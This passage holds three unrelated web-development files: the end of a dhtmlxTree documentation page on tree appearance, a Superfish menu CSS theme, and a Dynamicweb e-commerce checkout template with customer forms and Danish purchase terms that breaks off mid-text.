created:</div> </li> </ul> <pre class="code javascript"> <span class="sy0">&lt;</span>style<span class="sy0">&gt;</span> #treeboxbox_tree.<span class="me1">standartTreeImage</span> img<span class="br0">&#123;</span> width<span class="sy0">:</span>0px; <span class="br0">&#125;</span> <span class="sy0">&lt;/</span>style<span class="sy0">&gt;</span> &nbsp;</pre><ul> <li class="level1"><div class="li"> Create a div element on page and write the following script lines:</div> </li> </ul> <pre class="code javascript"> <span class="sy0">&lt;</span>div id<span class="sy0">=</span><span class="st0">&quot;treeboxbox_tree&quot;</span> style<span class="sy0">=</span><span class="st0">&quot;width:200;height:200&quot;</span><span class="sy0">&gt;&lt;/</span>div<span class="sy0">&gt;</span> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree<span class="sy0">=</span><span class="kw2">new</span> dhtmlXTreeObject<span class="br0">&#40;</span><span class="st0">&quot;treeboxbox_tree&quot;</span><span class="sy0">,</span><span class="st0">&quot;100%&quot;</span><span class="sy0">,</span><span class="st0">&quot;100%&quot;</span><span class="sy0">,</span>0<span class="br0">&#41;</span>; tree.<span class="me1">setImagePath</span><span class="br0">&#40;</span><span class="st0">&quot;[full path to this folder]/imgs/&quot;</span><span class="br0">&#41;</span>; tree.<span class="me1">enableTreeImages</span><span class="br0">&#40;</span><span class="st0">&quot;false&quot;</span><span class="br0">&#41;</span>; <span class="co1">// disable tree images</span> tree.<span class="me1">enableTreeLines</span><span class="br0">&#40;</span><span class="st0">&quot;false&quot;</span><span class="br0">&#41;</span>; <span class="co1">// disable tree lines</span> tree.<span class="me1">loadXML</span><span class="br0">&#40;</span>file<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> </div> <h4><a name="enabling_loading_text" id="enabling_loading_text">Enabling Loading Text</a></h4> <div class="level4"> <p> The user can set loading text for a tree item. This text will appear on item loading instead of its original text, and will be replaced by the original text when loading is done: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">enableLoadingItem</span><span class="br0">&#40;</span>text<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The default loading text set in dhtmlxTree is “Loading…”. </p> </div> <h4><a name="using_html_in_item_s_text" id="using_html_in_item_s_text">Using HTML in Item&#039;s Text</a></h4> <div class="level4"> <p> The user may use escaped <acronym title="HyperText Markup Language">HTML</acronym> in text attribute of item tag to include some <acronym title="HyperText Markup Language">HTML</acronym> into node&#039;s label, or he can use nested &lt;itemtext&gt; tag with CDATA for the same (this tag is supported only in PRO edition): </p> <pre class="code javascript"> <span class="sy0">&lt;?</span>xml version<span class="sy0">=</span><span class="st0">&quot;1.0&quot;</span><span class="sy0">&gt;</span> <span class="sy0">&lt;</span>tree id<span class="sy0">=</span><span class="st0">&quot;0&quot;</span><span class="sy0">&gt;</span> <span class="sy0">&lt;</span>item id<span class="sy0">=</span><span class="st0">&quot;1&quot;</span> text<span class="sy0">=</span><span class="st0">&quot;&amp;amp;lt; img src='some.gif' &amp;amp;gt;&quot;</span> <span class="sy0">/&gt;</span> <span class="co1">// using escaped HTML in text attribute</span> <span class="sy0">&lt;/</span>tree<span class="sy0">&gt;</span> <span class="sy0">&lt;</span>tree id<span class="sy0">=</span><span class="st0">&quot;0&quot;</span><span class="sy0">&gt;</span> <span class="sy0">&lt;</span>item id<span class="sy0">=</span><span class="st0">&quot;1&quot;</span><span class="sy0">&gt;</span> <span class="sy0">&lt;</span>itemtext<span class="sy0">&gt;&lt;!</span><span class="br0">&#91;</span>CDATA <span class="sy0">&lt;</span>img src<span class="sy0">=</span><span class="st0">'some.gif'</span><span class="sy0">&gt;</span> <span class="br0">&#93;</span><span class="br0">&#93;</span><span class="sy0">&gt;&lt;/</span>itemtext<span class="sy0">&gt;</span> <span class="co1">// using nested &lt;itemtext&gt; tag with CDATA</span> <span class="sy0">&lt;/</span>item<span class="sy0">&gt;</span> <span class="sy0">&lt;/</span>tree<span class="sy0">&gt;</span> &nbsp;</pre> </div> <div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="7471-10792" /><input type="hidden" name="rev" value="1335526056" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit" class="button" title="Text Manipulation" /></div></form></div> <h3><a name="style_manipulation" id="style_manipulation">Style Manipulation</a></h3> <div class="level3"> </div> <h4><a name="setting_individual_style_for_item" id="setting_individual_style_for_item">Setting Individual Style for Item</a></h4> <div class="level4"> <p> The user can set individual style for any item in the tree in the following way: </p> <pre class="code javascript"> <span class="sy0">&lt;</span>script<span class="sy0">&gt;</span> tree.<span class="me1">setItemStyle</span><span class="br0">&#40;</span>itemId<span class="sy0">,</span>style_string<span class="br0">&#41;</span>; <span class="sy0">&lt;/</span>script<span class="sy0">&gt;</span> &nbsp;</pre> <p> The parameters here are responsible for: </p> <ul> <li class="level1"><div class="li"> itemId - id of the item;</div> </li> <li class="level1"><div class="li"> style_string - valid <acronym title="Cascading Style Sheets">CSS</acronym> string.</div> </li> </ul> </div> <div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="10793-" /><input type="hidden" name="rev" value="1335526056" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit" class="button" title="Style Manipulation" /></div></form></div> <!-- wikipage stop --> </div> <div class="clearer">&nbsp;</div> <div class="stylefoot"> <div class="meta"> <div class="user"> </div> <!-- <div class="doc"> dhtmlxtree/setting_tree_appearance.txt &middot; Last modified: 2012/04/27 15:27 (external edit) </div> </div>--> <!--<div class="bar" id="bar__bottom">--> <!--<div class="bar-left" id="bar__bottomleft">--> <!--<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form>--> <!--<form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form>--> <!--</div>--> <!--<div class="bar-right" id="bar__bottomright">--> <!----> <!----> <!----> <!----> <!----> <!--<form class="button btn_index" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="index" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Index" class="button" accesskey="x" title="Index [X]" /></div></form>--> <!--<a class="nolink" href="#dokuwiki__top"><input type="button" class="button" value="Back to top" onclick="window.scrollTo(0, 0)" title="Back to top" /></a>&nbsp;--> <!--</div>--> <!--<div class="clearer"></div>--> <!--</div>--> </div> </div> <div class="footerinc"> </div> <div class="no"><img src="/dhtmlx/docs/lib/exe/indexer.php?id=dhtmlxtree%3Asetting_tree_appearance&amp;1345730751" width="1" height="1" alt="" /></div> <div class="footer"> <div class="footer-logo"></div> <div class="copyright">Copyright © 1998-2011 DHTMLX LTD.<br />All rights reserved.</div> <form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxtree:setting_tree_appearance" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> </div> </body> </html>
sites/all/libraries/superfish/style/white.css
jordanlgraham/ltms
.sf-menu.sf-style-white { float: left; margin-bottom: 1em; padding: 0; background: url("../images/nav-bg-blue.png") repeat-x scroll left top transparent; } .sf-menu.sf-style-white.sf-navbar { width: 100%; } .sf-menu.sf-style-white ul { padding-left: 0; } .sf-menu.sf-style-white a { border: none; color: #777777; padding: 0.75em 0.9em; } .sf-menu.sf-style-white a.sf-with-ul { padding-right: 2.25em; } .sf-menu.sf-style-white.rtl a.sf-with-ul { padding-left: 2.25em; padding-right: 1em; } .sf-menu.sf-style-white.sf-navbar a { border: 0; } .sf-menu.sf-style-white span.sf-description { color: #13a; display: block; font-size: 0.8em; line-height: 1.5em; margin: 5px 0 0 5px; padding: 0; } .sf-menu.sf-style-white li, .sf-menu.sf-style-white.sf-navbar { background: #ffffff; } .sf-menu.sf-style-white li li { background: #f7f7f7; } .sf-menu.sf-style-white li li li { background: #f5f5f5; } .sf-menu.sf-style-white li:hover, .sf-menu.sf-style-white li.sfHover, .sf-menu.sf-style-white li.active a, .sf-menu.sf-style-white a:focus, .sf-menu.sf-style-white a:hover, .sf-menu.sf-style-white a:active, .sf-menu.sf-style-white.sf-navbar li li { background: url("./sites/all/themes/ltms/images/nav-bg-blue.png") repeat-x scroll left top transparent; border-radius: 5px 5px 5px 5px; } .sf-menu.sf-style-white.sf-navbar li ul { background-color: #e9e9e9; } .sf-menu.sf-style-white.sf-navbar li ul li ul { background-color: transparent; } .sf-menu.sf-style-white .sf-sub-indicator { background-image: url('../images/arrows-777777.png'); } .sf-menu.sf-style-white.rtl .sf-sub-indicator { background-image: url('../images/arrows-777777-rtl.png'); } .sf-menu.sf-style-white ul.sf-megamenu li.sf-megamenu-wrapper ol, .sf-menu.sf-style-white ul.sf-megamenu li.sf-megamenu-wrapper ol li { margin: 0; padding: 0; } .sf-menu.sf-style-white ul.sf-megamenu li.sf-megamenu-wrapper a.menuparent { font-weight: bold; } .sf-menu.sf-style-white ul.sf-megamenu li.sf-megamenu-wrapper ol li.sf-megamenu-column { display: inline; float: left; width: 12em; } .sf-menu.sf-style-white.rtl ul.sf-megamenu li.sf-megamenu-wrapper ol li.sf-megamenu-column { float: right; } .sf-menu.sf-style-white li.sf-parent-children-1 ul.sf-megamenu { width: 12em; } .sf-menu.sf-style-white li.sf-parent-children-2 ul.sf-megamenu { width: 24em; } .sf-menu.sf-style-white li.sf-parent-children-3 ul.sf-megamenu { width: 36em; } .sf-menu.sf-style-white li.sf-parent-children-4 ul.sf-megamenu { width: 48em; } .sf-menu.sf-style-white li.sf-parent-children-5 ul.sf-megamenu { width: 60em; } .sf-menu.sf-style-white li.sf-parent-children-6 ul.sf-megamenu { width: 72em; } .sf-menu.sf-style-white li.sf-parent-children-7 ul.sf-megamenu { width: 84em; } .sf-menu.sf-style-white li.sf-parent-children-8 ul.sf-megamenu { width: 96em; } .sf-menu.sf-style-white li.sf-parent-children-9 ul.sf-megamenu { width: 108em; } .sf-menu.sf-style-white li.sf-parent-children-10 ul.sf-megamenu { width: 120em; }
S_DW_Continuous_Deployment_test/Files/Templates/eCom7/CartV2/Step/InformationInfoDirekt.html
Saftemand/S_DW_Continuous_Deployment_Test
<script type="text/javascript" language="JavaScript"> function infoDirectRequest() { var form = document.getElementById('ordersubmit'); var field1 = document.createElement('input'); field1.type = 'hidden'; field1.name = 'CartCmd'; field1.id = 'CartCmd'; field1.value = 'FetchingCustomerFromInfodirekt'; form.appendChild(field1); var field2 = document.createElement('input'); field2.type = 'hidden'; field2.name = 'customerPhone'; field2.id = 'customerPhone'; field2.value = document.getElementById('EcomOrderCustomerPhone').value; form.appendChild(field2); updateCart(); } </script> <form name="ordersubmit" id="ordersubmit" method="post"> <!--@LoopStart(ValidationErrors)--> <!--@HeaderStart--> <fieldset id="validation"> <legend><!--@Translate(validationerrors, "Validation errors")--></legend> <ul> <!--@HeaderEnd--> <li><!--@Translate(error, "Error in the input field")--> "<!--@Ecom:Cart.ValidationError.FieldName-->": <a href="javascript:document.getElementById('<!--@Ecom:Cart.ValidationError.FieldSystemName-->').focus();"><!--@Ecom:Cart.ValidationError.ErrorMessage--></a></li> <!--@FooterStart--> </ul> </fieldset> <!--@FooterEnd--> <!--@LoopEnd(ValidationErrors)--> <fieldset> <legend><!--@Translate(customerinformation, "Customer Information")--></legend> <fieldset id="billing"> <legend><!--@Translate(billingaddress, "Billing address")--></legend> <dl> <dt> <label for="EcomOrderCustomerCompany"><!--@Translate(company, "Company")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerCompany" id="EcomOrderCustomerCompany" value="<!--@Ecom:Order.Customer.Company-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerName"><!--@Translate(name, "Name")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerName" id="EcomOrderCustomerName" value="<!--@Ecom:Order.Customer.Name-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerAddress"><!--@Translate(address, "Address")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerAddress" id="EcomOrderCustomerAddress" value="<!--@Ecom:Order.Customer.Address-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerAddress2"><!--@Translate(address2, "Address 2")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerAddress2" id="EcomOrderCustomerAddress2" value="<!--@Ecom:Order.Customer.Address2-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerZip"><!--@Translate(zipcode, "Zipcode")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerZip" id="EcomOrderCustomerZip" value="<!--@Ecom:Order.Customer.Zip-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerCity"><!--@Translate(city, "City")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerCity" id="EcomOrderCustomerCity" value="<!--@Ecom:Order.Customer.City-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerCountry"><!--@Translate(country, "Country")--></label> </dt> <dd> <select name="EcomOrderCustomerCountry" id="EcomOrderCustomerCountry" onchange="updateCart();"> <!--@LoopStart(Countries)--> <!--@If Defined(Ecom:Country.IsCustomerCountryOrDefault)--> <option value="<!--@Ecom:Country.Code2-->" selected="selected"> <!--@Ecom:Country.Name--> </option> <!--@EndIf(Ecom:Country.IsCustomerCountryOrDefault)--> <!--@If Not Defined(Ecom:Country.IsCustomerCountryOrDefault)--> <option value="<!--@Ecom:Country.Code2-->"> <!--@Ecom:Country.Name--> </option> <!--@EndIf(Ecom:Country.IsCustomerCountryOrDefault)--> <!--@LoopEnd(Countries)--> </select> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerEmail"><!--@Translate(email, "E-mail")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerEmail" id="EcomOrderCustomerEmail" value="<!--@Ecom:Order.Customer.Email-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerPhone"><!--@Translate(phone, "Phone")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerPhone" id="EcomOrderCustomerPhone" value="<!--@Ecom:Order.Customer.Phone-->" /> <a href="javascript:infoDirectRequest();"><img src=/Files/Billeder/Ecom/Grafik/infoDirekt.gif alt="Info direkt service" border=0></a> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerFax"><!--@Translate(fax, "Fax")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerFax" id="EcomOrderCustomerFax" value="<!--@Ecom:Order.Customer.Fax-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerCell"><!--@Translate(mobile, "Mobile")--></label> </dt> <dd> <input type="text" name="EcomOrderCustomerCell" id="EcomOrderCustomerCell" value="<!--@Ecom:Order.Customer.Cell-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderCustomerComment"><!--@Translate(note, "Note")--></label> </dt> <dd> <textarea rows="6" name="EcomOrderCustomerComment" id="EcomOrderCustomerComment" cols="19" style="overflow:auto"><!--@Ecom:Order.Customer.Comment--></textarea> </dd> </dl> </fieldset> <fieldset id="delivery"> <legend><!--@Translate(deliveryaddress, "Delivery address")--></legend> <dl> <dt> <label for="EcomOrderDeliveryCompany"><!--@Translate(company, "Company")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryCompany" id="EcomOrderDeliveryCompany" value="<!--@Ecom:Order.Delivery.Company-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryName"><!--@Translate(name, "Name")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryName" id="EcomOrderDeliveryName" value="<!--@Ecom:Order.Delivery.Name-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryAddress"><!--@Translate(address, "Address")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryAddress" id="EcomOrderDeliveryAddress" value="<!--@Ecom:Order.Delivery.Address-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryAddress2"><!--@Translate(address2, "Address 2")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryAddress2" id="EcomOrderDeliveryAddress2" value="<!--@Ecom:Order.Delivery.Address2-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryZip"><!--@Translate(zipcode, "Zipcode")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryZip" id="EcomOrderDeliveryZip" value="<!--@Ecom:Order.Delivery.Zip-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryCity"><!--@Translate(city, "City")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryCity" id="EcomOrderDeliveryCity" value="<!--@Ecom:Order.Delivery.City-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryCountry"><!--@Translate(country, "Country")--></label> </dt> <dd> <select name="EcomOrderDeliveryCountry" id="EcomOrderDeliveryCountry" onchange="updateCart();"> <!--@LoopStart(Countries)--> <!--@If Defined(Ecom:Country.IsDeliveryCountryOrDefault)--> <option value="<!--@Ecom:Country.Code2-->" selected="selected"> <!--@Ecom:Country.Name--> </option> <!--@EndIf(Ecom:Country.IsDeliveryCountryOrDefault)--> <!--@If Not Defined(Ecom:Country.IsDeliveryCountryOrDefault)--> <option value="<!--@Ecom:Country.Code2-->"> <!--@Ecom:Country.Name--> </option> <!--@EndIf(Ecom:Country.IsDeliveryCountryOrDefault)--> <!--@LoopEnd(Countries)--> </select> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryEmail"><!--@Translate(email, "E-mail")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryEmail" id="EcomOrderDeliveryEmail" value="<!--@Ecom:Order.Delivery.Email-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryPhone"><!--@Translate(phone, "Phone")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryPhone" id="EcomOrderDeliveryPhone" value="<!--@Ecom:Order.Delivery.Phone-->" /> </dd> </dl> <dl> <dt> <label for="EcomOrderDeliveryCell"><!--@Translate(mobile, "Mobile")--></label> </dt> <dd> <input type="text" name="EcomOrderDeliveryCell" id="EcomOrderDeliveryCell" value="<!--@Ecom:Order.Delivery.Cell-->" /> </dd> </dl> </fieldset> <fieldset id="paymentanddelivery"> <legend><!--@Translate(paymentanddelivery, "Payment and delivery")--></legend> <dl> <dt><!--@Translate(paymentmethods, "Payment methods")--></dt> <dd> <!--@LoopStart(Paymethods)--> <label for="EcomCartPaymethodID_<!--@Ecom:Cart.Paymethod.ID-->"> <!--@If Defined(Ecom:Cart.Paymethod.IsSelected)--> <input onclick="updateCart();" type="radio" name="EcomCartPaymethodID" id="EcomCartPaymethodID_<!--@Ecom:Cart.Paymethod.ID-->" value="<!--@Ecom:Cart.Paymethod.ID-->" checked="checked" />&nbsp; <!--@EndIf(Ecom:Cart.Paymethod.IsSelected)--> <!--@If Not Defined(Ecom:Cart.Paymethod.IsSelected)--> <input onclick="updateCart();" type="radio" name="EcomCartPaymethodID" id="EcomCartPaymethodID_<!--@Ecom:Cart.Paymethod.ID-->" value="<!--@Ecom:Cart.Paymethod.ID-->" />&nbsp; <!--@EndIf(Ecom:Cart.Paymethod.IsSelected)--> <!--@Ecom:Cart.Paymethod.Name--> <!--@If Not Defined(Ecom:Cart.Paymethod.Price.IsZero)--> &nbsp;(<!--@Ecom:Cart.Paymethod.Price-->) <!--@EndIf(Ecom:Cart.Paymethod.Price.IsZero)--> </label> <!--@LoopEnd(Paymethods)--> </dd> </dl> <dl> <dt><!--@Translate(deliverymethods, "Delivery methods")--></dt> <dd> <!--@LoopStart(Shippingmethods)--> <label for="EcomCartShippingmethodID_<!--@Ecom:Cart.Shippingmethod.ID-->"> <!--@If Defined(Ecom:Cart.Shippingmethod.IsSelected)--> <input onclick="updateCart();" type="radio" name="EcomCartShippingmethodID" id="EcomCartShippingmethodID_<!--@Ecom:Cart.Shippingmethod.ID-->" value="<!--@Ecom:Cart.Shippingmethod.ID-->" checked="checked" /> <!--@EndIf(Ecom:Cart.Shippingmethod.IsSelected)--> <!--@If Not Defined(Ecom:Cart.Shippingmethod.IsSelected)--> <input onclick="updateCart();" type="radio" name="EcomCartShippingmethodID" id="EcomCartShippingmethodID_<!--@Ecom:Cart.Shippingmethod.ID-->" value="<!--@Ecom:Cart.Shippingmethod.ID-->" /> <!--@EndIf(Ecom:Cart.Shippingmethod.IsSelected)--> &nbsp;<!--@Ecom:Cart.Shippingmethod.Name--> <!--@If Not Defined(Ecom:Cart.ShippingMethod.Price.IsZero)--> &nbsp;(<!--@Ecom:Cart.ShippingMethod.Price-->) <!--@EndIf(Ecom:Cart.ShippingMethod.Price.IsZero)--> </label> <!--@LoopEnd(Shippingmethods)--> </dd> </dl> </fieldset> <!--@If Defined(Ecom:Cart.UseNewsletterSubscription)--> <fieldset id="newsletter"> <legend><!--@Translate(newsletter, "Newsletter")--></legend> <dl> <dd> <input type="hidden" name="EcomOrderSubscribeToNewsletter" /> <input type="checkbox" name="EcomOrderSubscribeToNewsletter" id="EcomOrderSubscribeToNewsletter" <!--@If Defined(Ecom:Order.Customer.NewsletterSubscribe)--> checked="checked" <!--@EndIf(Ecom:Order.Customer.NewsletterSubscribe)--> /> </dd> <dt> <label for="EcomOrderSubscribeToNewsletter"> <!--@Translate(newslettertext, "Do you want to recieve our newsletter ?")--> </label> </dt> </dl> </fieldset> <!--@EndIf(Ecom:Cart.UseNewsletterSubscription)--> <fieldset id="conditions"> <legend><!--@Translate(termsandconditions, "Terms and conditions")--></legend> <ol> <li> <strong>N&aelig;rv&aelig;rende aftale</strong> <p> N&aelig;rv&aelig;rende aftale er et juridisk dokument, der beskriver k&oslash;bers og eCommerce Demo rettigheder og forpligtelser i forbindelse med de tjenester, som eCommerce Demo formidler gennem ecommerce.dynamicweb.dk. </p> <ol type="a"> <li> <strong>N&aelig;rv&aelig;rende aftales virkning</strong> <p> N&aring;r k&oslash;ber benytter eCommerce Demo tjenester, erkl&aelig;rer k&oslash;ber med markering af feltet, &quot;jeg har l&aelig;st og accepteret eCommerce Demo vilk&aring;r&quot; sig indforst&aring;et med betingelserne i n&aelig;rv&aelig;rende aftale. </p> </li> </ol> </li> <li> <strong>Reklame</strong><br /> <p> Som kunde p&aring; eCommerce Demo modtager k&oslash;ber ca. hver 14. dag et nyhedsbrev fra eCommerce Demo. </p> <p> K&oslash;ber kan til enhver tid afmelde denne tjeneste. </p> </li> <li> <strong>Handler</strong><br /> <p> Alle k&oslash;b hos eCommerce Demo sker med kreditkort direkte til eCommerce Demo. K&oslash;ber kan betale med Dankort, Visa/Dankort og Mastercard.&nbsp;Efter k&oslash;bet sendes en kvittering for k&oslash;bet direkte til k&oslash;bers e-mailadresse. </p> <ol type="a"> <li> <strong>Rettigheder og forpligtelser</strong> <p> K&oslash;ber anerkender, at eCommerce Demo ikke er og ikke kan blive gjort ansvarlig for s&aelig;lgers og k&oslash;bers adf&aelig;rd eller for de varer, som s&aelig;lger udbyder til salg eller levering via eCommerce Demo services - uanset om s&aelig;lger er en enkeltperson eller en forretningsdrivende. </p> </li> <li> <strong>Forsendelse</strong> <p> Levering foreg&aring;r&nbsp;med Post Danmark eller fragtmand. P&aring; hvert enkelt produkt er den forventede leveringstid angivet. Ved samlet ordre bliver varene fremsendt enkeltvis pr. producent/s&aelig;lger. </p> </li> <li> <strong>Fortrydelsesret</strong> <p> Ethvert k&oslash;b foretaget fra eCommerce Demo er omfattet af fortrydelsesret s&aring;ledes, at k&oslash;ber inden for 14 dage fra modtagelsen af varen kan returnere varen til s&aelig;lger, men kun s&aring;fremt varen er i samme stand og m&aelig;ngde som ved modtagelsen. Ved specialfremstillede produkter bortfalder fortrydelsesretten fra det tidspunkt, hvor&nbsp;arbejdet p&aring; varen er p&aring;begyndt efter din accept. <br /> K&oslash;ber kan fortryde k&oslash;bet ved at: </p> <ol type="i"> <li>N&aelig;gte at modtage varen</li> <li>Overdrage varen til postv&aelig;senet</li> <li>Returnere varen til s&aelig;lgers adresse</li> </ol> <p> K&oslash;ber afholder fragtomkostninger ved returnering af varen direkte til s&aelig;lger, og returnering pr. postopkr&aelig;vning eller efterkrav accepteres ikke. K&oslash;ber skal, s&aring;fremt fortrydelsesretten udnyttes, give skriftlig meddelelse til eCommerce Demo herom med angivelse af ordre- og varenummer samt kontonummer til brug ved refusionen af k&oslash;besummen inkl. leveringsomkostninger jf. 3.5. </p> </li> <li> <strong>Reklamation og ombytning</strong> <p> Alle varer formidlet via eCommerce Demo er omfattet af k&oslash;belovens almindelige reklamationsfrister, medmindre andet er aftalt.<br /> Hvis den leverede vare er defekt, transportskadet eller der er leveret en forkert vare, forpligter s&aelig;lger sig til at modtage og inden for rimelig tid behandle skriftlige reklamationer med meddelelser om fejl, herunder erstatte defekte og transportskadede varer og ombytte forkert leverede varer. S&aelig;lger forpligter sig ligeledes til at erstatte k&oslash;bers rimelige udgifter i forbindelse med returnering af varen. <br /> Reklamationer afgivet inden for 2 m&aring;neder efter k&oslash;bsdato, eller efter at k&oslash;ber har opdaget manglen, anses for afgivet inden for rimelig tid, jf. herved k&oslash;belovens &sect; 81.<br /> Produkterne p&aring; eCommerce Demo er individuelt fremstillet, oftest h&aring;ndlavede, hvorfor ingen produkter er ens men unikke. Der&nbsp;kan derfor&nbsp;opst&aring; sm&aring; nuanceforskelle i f.eks. st&oslash;rrelse, farve og forarbejdning. </p> </li> <li> <strong>Refusion</strong> <p> I tilf&aelig;lde af returnerede varer eller forudbetalte varer som afbestilles f&oslash;r afsendelse, sker hel eller delvis refusion af k&oslash;besummen. Refusion sker ved bankoverf&oslash;rsel, og eCommerce Demo har derfor brug for oplysninger om registreringsnummer og kontonummer for din bankkonto. Disse oplysninger er ikke f&oslash;lsomme og kan uden videre oplyses pr. e-mail eller anden traditionel korrespondanceform ved oplysning om returnering af varer. </p> </li> <li> <strong>Fragtomkostninger</strong> <p> Fragtomkostningerne er indregnet i produkternes salgspriser, hvis andet ikke er oplyst ved det enkelte produkt. <br /> Dette g&aelig;lder kun forsendelser i Danmark. </p> </li> <li> <strong>Omkostninger til betalingskort</strong> <p> PBS opkr&aelig;ver et gebyr for anvendelse af betalingskort. eCommerce Demo har valgt at d&aelig;kke disse omkostninger, hvis du bruger Dankort, Visa/Dankort&nbsp;og eDankort. For alle &oslash;vrige kort opkr&aelig;ves der et betalingsgebyr p&aring; 1,25% af oms&aelig;tningen, hvilket er den betaling, som PBS opkr&aelig;ver eCommerce Demo. </p> </li> </ol> </li> <li> <strong>Registrering</strong> <p> K&oslash;ber forpligter sig til at tilmelde sig eCommerce Demo tjenester med rigtigt navn, adresse samt alle andre n&aelig;rmere oplysninger, k&oslash;ber bliver bedt om.<br /> K&oslash;bers kundekonto&nbsp;hos eCommerce Demo er personlig og m&aring; ikke udl&aring;nes til andre personer. </p> <ol type="a"> <li> <strong>Kontrakthabilitet</strong> <p> For at blive registreret skal k&oslash;ber juridisk v&aelig;re berettiget til at indg&aring; aftaler om k&oslash;b eller salg af de p&aring; hjemmesiden adviserede varer. </p> </li> <li> <strong>Beskyttelse af personoplysninger</strong> <p> eCommerce Demo forpligter sig til ikke at bruge disse oplysninger til andre form&aring;l end til brug for formidlingen, samt ikke at videregive dem til andre fysiske eller juridiske personer, medmindre k&oslash;ber har givet sit samtykke hertil. <br /> Dette g&aelig;lder dog ikke, hvor lovgivning eller gyldig anmodning fra en retsh&aring;ndh&aelig;vende eller offentlig forpligter eCommerce Demo til videregivelse. </p> </li> </ol> </li> <li> <strong>Handlerne</strong> <p> eCommerce Demo forbeholder sig ret til at annullere en igangv&aelig;rende eller foretaget handel, hvis tvingende juridiske eller tekniske hensyn n&oslash;dvendigg&oslash;r dette. </p> <ol type="a"> <li> <strong>eCommerce Demo rolle</strong> <p> eCommerce Demo er ikke part i nogen handler og stiller alene de tekniske hj&aelig;lpemidler i form af hjemmesiden samt&nbsp;vedr. berigtigelsen af k&oslash;bers betalingsforpligtelser til r&aring;dighed i forbindelse med indledning eller gennemf&oslash;relse af&nbsp;handlerne. eCommerce Demo agerer hverken som s&aelig;lger eller leverand&oslash;r af de varer eller tjenester, der er anf&oslash;rt i handlerne, og er s&aring;ledes ikke juridiske ansvarlig i relation til de forpligtelser, som g&aelig;lder for s&aelig;lgere af disse varer eller tjenester. </p> <p> eCommerce Demo er ikke og kan ikke g&oslash;res ansvarlig for en s&aelig;lgers adf&aelig;rd eller for de varer eller tjenester, som s&aelig;lger udbyder til salg eller levering &ndash; uanset om s&aelig;lger er en enkeltperson eller en erhvervsdrivende. </p> <p> eCommerce Demo kontrollerer ikke og er ikke ansvarlig for kvaliteten, sikkerheden eller lovligheden af varerne eller tjenesterne, for hvorvidt beskrivelsen af varerne er n&oslash;jagtige og korrekte, for hvorvidt s&aelig;lger har vilje og evne til at levere og s&aelig;lge disse varer eller tjenester, eller hvorvidt k&oslash;ber har vilje og evne til at betale derfor. </p> <p> eCommerce Demo unders&oslash;ger ikke p&aring; forh&aring;nd s&aelig;lgernes egne beskrivelser eller de omfattede varer eller tjenester. S&aring;fremt s&aelig;lger eller medlemmer afgiver oplysninger eller p&aring; 